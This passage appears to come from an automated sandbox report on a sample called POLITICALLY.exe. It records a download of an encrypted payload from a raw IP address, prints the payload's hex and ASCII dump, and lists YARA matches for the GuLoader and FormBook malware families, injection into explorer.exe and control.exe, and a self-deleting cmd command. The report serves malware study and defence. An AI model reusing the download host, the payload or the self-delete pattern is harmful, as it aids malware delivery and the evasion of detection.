                              May 11, 2021 20:43:41.179404020 CEST4882OUTGET /bin_XNLhDlJvG218.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: 111.90.149.46
                              Cache-Control: no-cache
                              May 11, 2021 20:43:41.396996021 CEST4939INHTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Last-Modified: Mon, 10 May 2021 20:56:41 GMT
                              Accept-Ranges: bytes
                              ETag: "134b90fade45d71:0"
                              Server: Microsoft-IIS/10.0
                              Date: Tue, 11 May 2021 18:43:41 GMT
                              Content-Length: 164416
                              Data Raw: d1 52 55 02 7a 6a f4 c7 51 b9 85 e1 b1 3a cd 1e d3 72 7f 3e 3c 36 1d 76 f6 cd f9 2f 46 b9 bf a5 ec 28 96 05 9a 51 69 37 7f 67 d7 5b 82 b4 aa d6 f8 20 26 a8 c3 97 ac 27 79 c0 2d 97 2b f9 f4 ca 24 30 15 a5 6d f9 66 2d f5 d2 74 d8 f4 c5 0b 37 c9 23 8e a1 50 7d 03 c7 55 ee 0e 64 4d 33 17 92 c4 55 24 22 94 68 9f 98 89 36 a5 ee 94 14 fc be f2 6e 78 9b 33 71 d1 02 5f 82 93 6f 2d 2e 74 32 2c 97 19 6f 41 75 a5 2e 67 d8 f8 b1 f8 fd 9a aa 35 11 fd 7f 46 29 9e fa ee 1a 14 11 d4 26 e3 6d e4 e4 6e 2c 79 bb 9a 2a 12 5c fa 2c 06 70 32 99 ab ee 0a e3 f6 6a 34 87 0f 60 e2 42 f7 f3 72 00 bd fa 58 70 3f 0c eb 96 0a d1 f0 c9 71 49 68 f8 1f cb 48 b4 a0 d8 60 4e a4 ca 3c 16 12 36 72 f7 d8 14 74 f2 31 07 9d 5e 1e ac e2 13 45 55 18 21 bc 25 bd ac 8b 72 29 c8 35 30 ce 77 4f aa 34 6f 4f 0a b8 66 e8 de 4c 4d a1 15 dc 53 e8 63 96 7b c2 8a 83 43 12 7b ae cd 1b fb 60 08 7a 88 a6 2d e4 e6 b6 7d f0 92 6c f6 b3 5d e4 82 e8 dd f4 ea 59 3a cc 34 d4 7b f5 66 da b0 81 e4 71 a1 02 0d 4f 72 b7 73 e6 e3 91 80 cc 1a dc 4e f8 55 99 6a 7d 2e 1a cf c5 44 76 59 e1 aa 8e ca 5b 84 d2 2c 26 67 4a 93 ad c3 bd d6 ca 19 97 24 27 fb dc 53 60 c7 1d 66 b8 45 9f 44 4c d4 4a 7c 33 c6 93 e4 fd d8 3b 5d fd d5 0c 03 98 60 9a 26 23 66 93 ef ad f4 58 2f 7e 3e 95 31 82 9b f5 a3 c7 95 73 0b 69 e5 fc 24 9a 33 a3 9c e1 53 af 2e 90 f5 0c b3 aa c9 6b 90 f6 55 d6 66 51 22 22 11 03 2a 93 df 5e 34 1d 32 41 bd c7 13 a5 41 f2 8d c2 ad 13 2d be 48 69 38 f3 a0 dc 83 b7 65 b4 d8 72 0a 99 3a fd 63 ad 59 7c 68 1a 49 ea 03 f3 53 53 8e e5 19 dc eb d6 eb f0 b4 19 58 26 62 3f 09 3e 0f f8 7e 03 a7 60 81 d4 94 0d 31 b1 a6 68 bc 23 3f fd f5 31 26 d5 f8 0b e4 68 33 8c 52 21 ad 15 02 6c 13 71 be 3a 3a 42 44 f5 af 08 a0 4a e9 5e 7b bd d0 e8 33 69 56 e1 b7 d3 ac 42 40 6d fc 79 90 7f f9 65 6d 73 a8 9a c9 48 75 00 e6 db c0 63 0b 6a 87 51 4c eb 3f 91 8d f8 1a f8 54 fa fe a9 cb 81 95 65 f5 0c c5 c8 51 0d e5 02 33 88 ad 16 50 45 d9 7f 02 3d 08 93 c1 bc 4f 71 8c 27 bb 34 7c 64 1a 8b bc 7d de e5 dc 8c 33 fa ef 20 45 af c0 76 d5 8e 0b 31 a7 dc bc 57 23 4f f4 af 7f ff 97 3d 27 c8 af 77 2b d7 4e c6 20 10 74 e4 60 99 46 50 97 8e 94 b4 8a 86 7b 43 ba 8b 38 19 8e 5d 05 f8 f7 43 c6 bb 57 72 e9 eb ca ed a2 62 d6 02 a6 43 a6 21 8a 22 62 80 ae 92 04 c0 91 fa 0d 12 7d d8 6a b5 d3 82 5d f8 e7 43 2c 61 d3 2e 07 cb da a0 6b a2 1a 56 05 96 7a 21 73 84 e4 fa ab 1e 4c 1e d5 34 58 1d 1a 7e 5b fe 42 2a 39 a3 22 d6 44 35 98 a3 ca 5a f4 24 0b 9d 27 f5 7d 71 51 c2 ad 6e 3f fc ab 81 89 26 a8 9d bd 29 74 37 71 1e 79 d1 9b 0b 50 12 2b 95 5f 2e 20 75 87 82 cb 9e f4 52 09 dc 87 31 3d 01 01 27 b8 49 e3 b7 29 62 45 59 33 5a af 38 cc 88 ce 62 bb b2 a0 95 eb 1f 7c 05 c0 b1 69 6a 50 f7 85 f9 66 2d f5 8a f7 30 fd 4e c3 b4 09 1f 05 a1 53 bc 80 07 7d ed 06 9b ac a3 17 92 c4 55 24 22 94 68 9f 98 89 36 a5 ee 94 14 fc be f2 6e 78 9b 33 71 d1 02 5f 82 93 6f 95 2e 74 32 22 88 a3 61 41 c1 ac e3 46 60 f9 fd 35 dc ce c2 5c 62 dd 0f 34 46 f9 88 8f 77 34 72 b5 48 8d 02 90 c4 0c 49 59 c9 ef 44 32 35 94 0c 42 3f 61 b9 c6 81 6e 86 d8 67 39 8d 2b 60 e2 42 f7 f3 72 00 c0 9c 67 6b 06 0b ba de 33 d6 a1 81 48 4e 39 b0 3d 51 b2 fc d5 df 31 06 86 50 f3 5e 28 31 23 bf fa 8e b8 ba 09 00 cc 16 4c c5 81 7b 7c 52 49 69 bc 25 bd ac 8b 72 29 c8 65 75 ce 77 03 ab 35 6f 95 f8 68 21 e8 de 4c 4d a1 15 dc 53 08 63 94 7a c9 8b 89 43 12 0b ac cd 1b fb 60 08 7a 88 a6 2d 54 29 b7 7d f0 82
                              Data Ascii: RUzjQ:r><6v/F(Qi7g[ &'y-+$0mf-t7#P}UdM3U$"h6nx3q_o-.t2,oAu.g5F)&mn,y*\,p2j4`BrXp?qIhH`N<6rt1^EU!%r)50wO4oOfLMSc{C{`z-}l]Y:4{fqOrsNUj}.DvY[,&gJ$'S`fEDLJ|3;]`&#fX/~>1si$3S.kUfQ""*^42AA-Hi8er:cY|hISSX&b?>~`1h#?1&h3R!lq::BDJ^{3iVB@myemsHucjQL?TeQ3PE=Oq'4|d}3 Ev1W#O='w+N t`FP{C8]CWrbC!"b}j]C,a.kVz!sL4X~[B*9"D5Z$'}qQn?&)t7qyP+_. uR1='I)bEY3Z8b|ijPf-0NS}U$"h6nx3q_o.t2"aAF`5\b4Fw4rHIYD25B?ang9+`Brgk3HN9=Q1P^(1#L{|RIi%r)euw5oh!LMSczC`z-T)}


                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: POLITICALLY.exe PID: 7124 Parent PID: 6140

                              General

                              Start time:20:42:20
                              Start date:11/05/2021
                              Path:C:\Users\user\Desktop\POLITICALLY.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\POLITICALLY.exe'
                              Imagebase:0x400000
                              File size:225280 bytes
                              MD5 hash:80B3365808440838596864BD6D492C02
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Visual Basic
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:low

                              Analysis Process: POLITICALLY.exe PID: 6976 Parent PID: 7124

                              General

                              Start time:20:43:02
                              Start date:11/05/2021
                              Path:C:\Users\user\Desktop\POLITICALLY.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\POLITICALLY.exe'
                              Imagebase:0x400000
                              File size:225280 bytes
                              MD5 hash:80B3365808440838596864BD6D492C02
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:low

                              Analysis Process: explorer.exe PID: 3440 Parent PID: 6976

                              General

                              Start time:20:43:45
                              Start date:11/05/2021
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:
                              Imagebase:0x7ff6f22f0000
                              File size:3933184 bytes
                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: control.exe PID: 5548 Parent PID: 3440

                              General

                              Start time:20:44:00
                              Start date:11/05/2021
                              Path:C:\Windows\SysWOW64\control.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\control.exe
                              Imagebase:0x330000
                              File size:114688 bytes
                              MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:moderate

                              Analysis Process: cmd.exe PID: 6028 Parent PID: 5548

                              General

                              Start time:20:44:04
                              Start date:11/05/2021
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:/c del 'C:\Users\user\Desktop\POLITICALLY.exe'
                              Imagebase:0x2a0000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: conhost.exe PID: 6776 Parent PID: 6028

                              General

                              Start time:20:44:04
                              Start date:11/05/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff61de10000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Disassembly

                              Code Analysis

                              Reset < >